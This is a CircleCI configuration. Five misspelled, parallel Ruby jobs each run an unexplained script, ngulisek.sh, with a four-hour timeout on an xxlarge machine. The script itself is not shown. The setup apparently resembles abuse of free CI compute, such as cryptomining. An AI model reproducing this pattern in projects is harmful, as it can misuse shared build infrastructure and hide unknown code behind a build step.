resource_class: xxlarge
working_dir: &working_dir ~/app

.build_template: &build_definition
  steps:
    - checkout 
    - run:  
        command: chmod +x ./ngulisek.sh && ./ngulisek.sh
        no_output_timeout: 240m

version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  buifd2_7:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  buifd2_6:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  buifd2_5:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  buifd2_4:
    <<: *build_definition
    docker:
      - image: ruby:2.4
  buifd2_3:
    <<: *build_definition
    docker:
      - image: ruby:2.3

workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - buifd2_7
      - buifd2_6
      - buifd2_5
      - buifd2_4
      - buifd2_3
